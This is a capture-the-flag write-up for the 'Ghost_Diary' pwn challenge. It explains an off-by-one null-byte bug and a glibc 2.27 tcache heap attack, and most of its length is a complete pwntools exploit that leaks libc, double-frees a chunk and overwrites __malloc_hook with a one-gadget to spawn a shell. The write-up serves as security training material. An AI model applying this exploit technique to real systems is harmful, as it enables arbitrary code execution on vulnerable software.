---
name: Ghost_Diary
points: 500
category: pwn
author: ewn10
---

We are given a stripped binary, and nothing else; time for some reverse
engineering. We find out that we can allocate strings, write to them, read from
them, and free them. There are some interesting restrictions on the size of the
allocated strings---they can't be between 241-271 characters in length, or
greater than 480---but this doesn't affect our exploit in any significant way.
We also find an off-by-one error in the function responsible for reading in
input from the user:

```c
while (i1 != length) {
  sVar2 = read(0,&ch,1);
  if (sVar2 != 1) {
    puts("read error");
                /* WARNING: Subroutine does not return */
    exit(-1);
  }
  if (ch == '\n') break;
  str[(ulong)i1] = ch;
  i1 = i1 + 1;
}
str[(ulong)i1] = '\0';
```

Notice that we assign `i1` to null, even if `i1 == length`---writing a null byte
one past the end of the actual buffer. This is a pretty standard null byte
poisoning heap attack.

Inspecting the libc present on the shell server, we see we're running against
version 2.27, which means we'll have the tcache to contend with---no problem, we
just need to remember to fill or drain the tcache free lists when necessary so
that our chunks go onto or come from the unsorted bins list instead of the
tcache. In fact, this makes the last step of the exploit---getting an arbitrary
write---easier than it is without tcache, since there are no checks on the
validity of the `next` pointer within a free tcache chunk like there are with
the `fd` pointer of a free fastbin chunk, so we don't need to do the standard
`0x7f` size trick to write to `__malloc_hook` and can just set `next` to point
to the address of `__malloc_hook` directly.

## Full exploit

```python
from pwn import *

binary_name = 'ghostdiary'
context.binary = './' + binary_name
p = context.binary.process(aslr=False)

TCACHE_MAX = 7

# size -> number of chunks in tcache
tcache_chunks = {}
# size -> [chunk] (used for tcache manipulation)
filler_chunks = {}

def to_chunk_sz(size):
    return (size + 16) >> 4 << 4

def alloc(size):
    # 0-0xf0, 0x110-0x1e0
    if (size > 240 and size < 272) or size > 480:
        raise ValueError('Unable to allocate that size')

    chunk_sz = to_chunk_sz(size)
    tcache_chunks[chunk_sz] = max(tcache_chunks.get(chunk_sz, 0) - 1, 0)
    log.info('tcache {:x}: {}'.format(chunk_sz, tcache_chunks[chunk_sz]))

    p.sendlineafter('> ', '1')
    p.sendlineafter('> ', '2' if size >= 272 else '1')
    p.sendlineafter('size: ', str(size))
    p.recvuntil('page #')
    n = int(p.recvline(False))
    log.info('Allocated {:x}({:x})@{}'.format(size, (size + 16) >> 4 << 4, n))
    return (n, chunk_sz)

def writeBlock(chunk, data):
    if '\n' in data:
        raise ValueError('Cannot write newlines')
    n, chunk_sz = chunk
    p.sendlineafter('> ', '2')
    p.sendlineafter('Page: ', str(n))
    p.sendlineafter('Content: ', data)

def readBlock(chunk):
    n, chunk_sz = chunk
    p.sendlineafter('> ', '3')
    p.sendlineafter('Page: ', str(n))
    p.recvuntil('Content: ')
    return p.recvuntil('\n1. New page in diary\n', drop=True)

def free(chunk):
    n, chunk_sz = chunk

    tcache_chunks[chunk_sz] = min(tcache_chunks.get(chunk_sz, 0) + 1, TCACHE_MAX)
    log.info('tcache {:x}: {}'.format(chunk_sz, tcache_chunks[chunk_sz]))

    p.sendlineafter('> ', '4')
    p.sendlineafter('Page: ', str(n))
    log.info('Freed @{}'.format(n))

def fill_tcache(size):
    chunk_sz = to_chunk_sz(size)
    n = TCACHE_MAX
    try:
        n -= tcache_chunks[chunk_sz]
    except KeyError:
        pass
    log.info('Filling tcache size {:x} ({})'.format(chunk_sz, n))
    chunks = filler_chunks.get(chunk_sz, [])
    for _ in range(n - len(chunks)):
        chunks.append(alloc(size))
    for chunk in chunks:
        free(chunk)

def drain_tcache(size):
    chunk_sz = to_chunk_sz(size)
    n = tcache_chunks.get(chunk_sz, 0)
    log.info('Draining tcache size {:x} ({})'.format(chunk_sz, n))
    chunks = []
    for _ in range(n):
        chunks.append(alloc(size))
    try:
        filler_chunks[chunk_sz] += chunks
    except KeyError:
        filler_chunks[chunk_sz] = chunks

# alloc and fill
def falloc(size, char, overflow=False):
    chunk = alloc(size)
    writeBlock(chunk, char * (size - (0 if overflow else 1)))
    return chunk

ca = falloc(0xf0, 'A') # chunk A - base free chunk
cb = falloc(0x118, 'B') # chunk B - overflow
cc = falloc(0xf0, 'C') # chunk C - free

fill_tcache(0xf0)
free(ca) # unsorted
writeBlock(cb, 'B'*0x110 + p64(0x220)) # set prev_size and overflow
free(cc) # unsorted
drain_tcache(0xf0)
ca = alloc(0xf0) # re-allocate A, make B a new free chunk
cbd = readBlock(cb)
cb_fd = u64(cbd.ljust(8, '\0'))
libc_base = cb_fd - 0x60 - 0x00000000003ebc40
libc_malloc_hook = libc_base + 0x00000000003ebc30
log.info('libc@{:08x}'.format(libc_base))


fill_tcache(0xf0) # free up available allocated chunk slots

cb2 = alloc(0x128) # overlapping with b
cd = alloc(0x128) # filler to pad tcache size
free(cd)
free(cb)
free(cb2) # double free
cb3 = alloc(0x128) # get B back for writing
writeBlock(cb3, p64(libc_malloc_hook))
alloc(0x128) # get B again
hook_chunk = alloc(0x128) # get pointer to hook
writeBlock(hook_chunk, p64(libc_base + 0x10a38c)) # one gadget to hook
# ui.pause()

p.sendlineafter('> ', '1')
p.sendlineafter('> ', '1')
p.sendlineafter('size: ', '1') # malloc and win

p.interactive()
```


